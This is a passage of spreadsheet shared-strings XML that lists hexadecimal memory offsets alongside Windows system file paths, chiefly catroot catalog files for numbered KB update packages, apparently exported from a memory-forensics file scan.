  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_5_for_KB3006137~31bf3</t>
  </si>
  <si>
    <t>0xdf6ad398</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_5_for_KB3078601~31bf3</t>
  </si>
  <si>
    <t>0xdf6ad570</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_5_for_KB2937610~31bf3</t>
  </si>
  <si>
    <t>0xdf6ad950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_5_for_KB2919469~31bf3</t>
  </si>
  <si>
    <t>0xdf6adc68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_5_for_KB2894844~31bf3</t>
  </si>
  <si>
    <t>0xdf6adda8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_5_for_KB2931356~31bf3</t>
  </si>
  <si>
    <t>0xdf6adf80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_5_for_KB2862330~31bf3</t>
  </si>
  <si>
    <t>0xdf6ae2f0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_5_for_KB3156019~31bf3</t>
  </si>
  <si>
    <t>0xdf6ae608</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_5_for_KB3124275~31bf3</t>
  </si>
  <si>
    <t>0xdf6ae748</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_5_for_KB982018~31bf38</t>
  </si>
  <si>
    <t>0xdf6ae920</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_5_for_KB3110329~31bf3</t>
  </si>
  <si>
    <t>0xdf6aec38</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_5_for_KB3046480~31bf3</t>
  </si>
  <si>
    <t>0xdf6aeee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_5_for_KB3035132~31bf3</t>
  </si>
  <si>
    <t>0xdf6af258</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_61_for_KB3003743~31bf</t>
  </si>
  <si>
    <t>0xdf6af460</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_654_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf6af638</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_60_for_KB3061518~31bf</t>
  </si>
  <si>
    <t>0xdf6af950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_60_for_KB3011780~31bf</t>
  </si>
  <si>
    <t>0xdf6afa90</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_61_for_KB2992611~31bf</t>
  </si>
  <si>
    <t>0xdf6afc68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_60_for_KB3003743~31bf</t>
  </si>
  <si>
    <t>0xdf6aff80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_60_for_KB2992611~31bf</t>
  </si>
  <si>
    <t>0xdf6b02f0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_686_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf6b0608</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_685_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf6b0748</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_6_for_KB2533623~31bf3</t>
  </si>
  <si>
    <t>0xdf6b0920</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_684_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf6b0c38</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_647_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf6b0ee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_62_for_KB3003743~31bf</t>
  </si>
  <si>
    <t>0xdf6b1278</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_6_for_KB2908783~31bf3</t>
  </si>
  <si>
    <t>0xdf6b1590</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_6_for_KB2807986~31bf3</t>
  </si>
  <si>
    <t>0xdf6b18a8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_6_for_KB2761217~31bf3</t>
  </si>
  <si>
    <t>0xdf6b19e8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_6_for_KB2862330~31bf3</t>
  </si>
  <si>
    <t>0xdf6b1bc0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_6_for_KB2631813~31bf3</t>
  </si>
  <si>
    <t>0xdf6b1f80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_6_for_KB2510531~31bf3</t>
  </si>
  <si>
    <t>0xdf6b2248</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_70_for_KB3068708~31bf</t>
  </si>
  <si>
    <t>0xdf6b2560</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_70_for_KB3060716~31bf</t>
  </si>
  <si>
    <t>0xdf6b2920</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_6_for_KB3124275~31bf3</t>
  </si>
  <si>
    <t>0xdf6b2c38</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_6_for_KB3110329~31bf3</t>
  </si>
  <si>
    <t>0xdf6b2d78</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_70_for_KB3004375~31bf</t>
  </si>
  <si>
    <t>0xdf6b2ee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_6_for_KB2970228~31bf3</t>
  </si>
  <si>
    <t>0xdf6b3288</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_71_for_KB3080079~31bf</t>
  </si>
  <si>
    <t>0xdf6b35a0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_71_for_KB3071756~31bf</t>
  </si>
  <si>
    <t>0xdf6b36e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_71_for_KB3080149~31bf</t>
  </si>
  <si>
    <t>0xdf6b38b8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_71_for_KB3068708~31bf</t>
  </si>
  <si>
    <t>0xdf6b3bd0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_71_for_KB3004375~31bf</t>
  </si>
  <si>
    <t>0xdf6b3d10</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_71_for_KB3060716~31bf</t>
  </si>
  <si>
    <t>0xdf6b3ee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_70_for_KB3080149~31bf</t>
  </si>
  <si>
    <t>0xdf6b4258</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_72_for_KB3080079~31bf</t>
  </si>
  <si>
    <t>0xdf6b4460</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_73_for_KB3004375~31bf</t>
  </si>
  <si>
    <t>0xdf6b4638</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_72_for_KB3068708~31bf</t>
  </si>
  <si>
    <t>0xdf6b4950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_72_for_KB3060716~31bf</t>
  </si>
  <si>
    <t>0xdf6b4c68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_72_for_KB3004375~31bf</t>
  </si>
  <si>
    <t>0xdf6b4da8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_72_for_KB3071756~31bf</t>
  </si>
  <si>
    <t>0xdf6b4f80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_72_for_KB2984972~31bf</t>
  </si>
  <si>
    <t>0xdf6b52f0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_73_for_KB3071756~31bf</t>
  </si>
  <si>
    <t>0xdf6b5608</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_73_for_KB3068708~31bf</t>
  </si>
  <si>
    <t>0xdf6b5748</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_73_for_KB3080149~31bf</t>
  </si>
  <si>
    <t>0xdf6b5920</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_73_for_KB3060716~31bf</t>
  </si>
  <si>
    <t>0xdf6b5c38</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_73_for_KB2984972~31bf</t>
  </si>
  <si>
    <t>0xdf6b5ee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_72_for_KB3080149~31bf</t>
  </si>
  <si>
    <t>0xdf6b6278</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_74_for_KB3071756~31bf</t>
  </si>
  <si>
    <t>0xdf6b6590</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_74_for_KB3060716~31bf</t>
  </si>
  <si>
    <t>0xdf6b68a8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_74_for_KB3004375~31bf</t>
  </si>
  <si>
    <t>0xdf6b69e8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_74_for_KB3068708~31bf</t>
  </si>
  <si>
    <t>0xdf6b6bc0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_74_for_KB2984972~31bf</t>
  </si>
  <si>
    <t>0xdf6b6f80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_73_for_KB3080079~31bf</t>
  </si>
  <si>
    <t>0xdf6b7248</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_75_for_KB2808679~31bf</t>
  </si>
  <si>
    <t>0xdf6b7560</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_75_for_KB2685813~31bf</t>
  </si>
  <si>
    <t>0xdf6b7920</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_74_for_KB3126587~31bf</t>
  </si>
  <si>
    <t>0xdf6b7c38</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_74_for_KB3080149~31bf</t>
  </si>
  <si>
    <t>0xdf6b7d78</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_74_for_KB3147071~31bf</t>
  </si>
  <si>
    <t>0xdf6b7ee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_74_for_KB3080079~31bf</t>
  </si>
  <si>
    <t>0xdf6b8288</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_75_for_KB3080079~31bf</t>
  </si>
  <si>
    <t>0xdf6b85a0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_75_for_KB3071756~31bf</t>
  </si>
  <si>
    <t>0xdf6b86e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_75_for_KB3080149~31bf</t>
  </si>
  <si>
    <t>0xdf6b88b8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_75_for_KB3068708~31bf</t>
  </si>
  <si>
    <t>0xdf6b8bd0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_75_for_KB3004375~31bf</t>
  </si>
  <si>
    <t>0xdf6b8d10</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_75_for_KB3060716~31bf</t>
  </si>
  <si>
    <t>0xdf6b8ee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_75_for_KB2984972~31bf</t>
  </si>
  <si>
    <t>0xdf6b9258</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_76_for_KB2984976~31bf</t>
  </si>
  <si>
    <t>0xdf6b9460</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_76_for_KB3126587~31bf</t>
  </si>
  <si>
    <t>0xdf6b9638</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_76_for_KB2808679~31bf</t>
  </si>
  <si>
    <t>0xdf6b9950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_76_for_KB2685811~31bf</t>
  </si>
  <si>
    <t>0xdf6b9c68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_75_for_KB3147071~31bf</t>
  </si>
  <si>
    <t>0xdf6b9da8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_76_for_KB2984972~31bf</t>
  </si>
  <si>
    <t>0xdf6b9f80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_75_for_KB3126587~31bf</t>
  </si>
  <si>
    <t>0xdf6ba2f0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_77_for_KB2813430~31bf</t>
  </si>
  <si>
    <t>0xdf6ba608</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_76_for_KB3159398~31bf</t>
  </si>
  <si>
    <t>0xdf6ba748</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_77_for_KB2984972~31bf</t>
  </si>
  <si>
    <t>0xdf6ba920</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_76_for_KB3147071~31bf</t>
  </si>
  <si>
    <t>0xdf6bac38</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_76_for_KB3080079~31bf</t>
  </si>
  <si>
    <t>0xdf6baee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_76_for_KB3071756~31bf</t>
  </si>
  <si>
    <t>0xdf6bb278</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_77_for_KB3184143~31bf</t>
  </si>
  <si>
    <t>0xdf6bb590</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_77_for_KB3147071~31bf</t>
  </si>
  <si>
    <t>0xdf6bb8a8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_77_for_KB3126587~31bf</t>
  </si>
  <si>
    <t>0xdf6bb9e8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_77_for_KB3159398~31bf</t>
  </si>
  <si>
    <t>0xdf6bbbc0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_77_for_KB3071756~31bf</t>
  </si>
  <si>
    <t>0xdf6bbf80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_77_for_KB2893519~31bf</t>
  </si>
  <si>
    <t>0xdf6bc248</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_78_for_KB3126587~31bf</t>
  </si>
  <si>
    <t>0xdf6bc560</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_78_for_KB3071756~31bf</t>
  </si>
  <si>
    <t>0xdf6bc920</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_78_for_KB2813430~31bf</t>
  </si>
  <si>
    <t>0xdf6bcc38</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_78_for_KB2773072~31bf</t>
  </si>
  <si>
    <t>0xdf6bcd78</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_78_for_KB2893519~31bf</t>
  </si>
  <si>
    <t>0xdf6bcee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_78_for_KB2685811~31bf</t>
  </si>
  <si>
    <t>0xdf6bd288</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_79_for_KB3172605~31bf</t>
  </si>
  <si>
    <t>0xdf6bd5a0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_79_for_KB3147071~31bf</t>
  </si>
  <si>
    <t>0xdf6bd6e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_7_for_KB2510531~31bf3</t>
  </si>
  <si>
    <t>0xdf6bd8b8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_79_for_KB3126587~31bf</t>
  </si>
  <si>
    <t>0xdf6bdbd0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_78_for_KB3184143~31bf</t>
  </si>
  <si>
    <t>0xdf6bdd10</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_79_for_KB2813347~31bf</t>
  </si>
  <si>
    <t>0xdf6bdee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_78_for_KB3147071~31bf</t>
  </si>
  <si>
    <t>0xdf6be258</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_7_for_KB2639308~31bf3</t>
  </si>
  <si>
    <t>0xdf6be460</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_7_for_KB2807986~31bf3</t>
  </si>
  <si>
    <t>0xdf6be638</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_7_for_KB2547666~31bf3</t>
  </si>
  <si>
    <t>0xdf6be950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_7_for_KB2545698~31bf3</t>
  </si>
  <si>
    <t>0xdf6bec68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_7_for_KB2534366~31bf3</t>
  </si>
  <si>
    <t>0xdf6beda8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_7_for_KB2560656~31bf3</t>
  </si>
  <si>
    <t>0xdf6bef80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_7_for_KB2533623~31bf3</t>
  </si>
  <si>
    <t>0xdf6bf2f0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_7_for_KB3110329~31bf3</t>
  </si>
  <si>
    <t>0xdf6bf608</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_7_for_KB2984976~31bf3</t>
  </si>
  <si>
    <t>0xdf6bf748</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_803_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf6bf920</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_7_for_KB2923545~31bf3</t>
  </si>
  <si>
    <t>0xdf6bfc38</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_7_for_KB2732059~31bf3</t>
  </si>
  <si>
    <t>86~~6.1.5.1</t>
  </si>
  <si>
    <t>0xdf6bfee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_7_for_KB2667402~31bf3</t>
  </si>
  <si>
    <t>0xdf6c0228</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_81_for_KB2973351~31bf</t>
  </si>
  <si>
    <t>0xdf6c0540</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_80_for_KB3172605~31bf</t>
  </si>
  <si>
    <t>0xdf6c0858</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_80_for_KB3147071~31bf</t>
  </si>
  <si>
    <t>0xdf6c0998</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_810_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf6c0b70</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_7_for_KB3138612~31bf3</t>
  </si>
  <si>
    <t>0xdf6c0e40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_80_for_KB3126587~31bf</t>
  </si>
  <si>
    <t>0xdf6c11e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_82_for_KB2871997~31bf</t>
  </si>
  <si>
    <t>0xdf6c1320</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_82_for_KB3172605~31bf</t>
  </si>
  <si>
    <t>0xdf6c14f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_82_for_KB2685813~31bf</t>
  </si>
  <si>
    <t>0xdf6c18b8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_81_for_KB3172605~31bf</t>
  </si>
  <si>
    <t>0xdf6c1bd0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_81_for_KB3147071~31bf</t>
  </si>
  <si>
    <t>0xdf6c1d10</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_82_for_KB2574819~31bf</t>
  </si>
  <si>
    <t>0xdf6c1ee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_81_for_KB3126587~31bf</t>
  </si>
  <si>
    <t>0xdf6c7228</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\NetworkConnectionsFolder.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf6c7400</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4Conne</t>
  </si>
  <si>
    <t>ctionSecurity</t>
  </si>
  <si>
    <t>0xdf6c7cf8</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\msdt.events.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf6c8760</t>
  </si>
  <si>
    <t>0xdf6c8a00</t>
  </si>
  <si>
    <t>\Windows\System32\spp\tokens\ppdlic\Microsoft-Windows-OfflineFiles-Core-ppdlic.xrm-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf6c99c8</t>
  </si>
  <si>
    <t>\Windows\System32\usbmon.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf6ca1e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_83_for_KB3172605~31bf</t>
  </si>
  <si>
    <t>0xdf6ca4f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_83_for_KB3042058~31bf</t>
  </si>
  <si>
    <t>0xdf6ca810</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_83_for_KB2973351~31bf</t>
  </si>
  <si>
    <t>0xdf6ca950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_840_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf6cab28</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_83_for_KB2871997~31bf</t>
  </si>
  <si>
    <t>0xdf6cae40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_82_for_KB2973351~31bf</t>
  </si>
  <si>
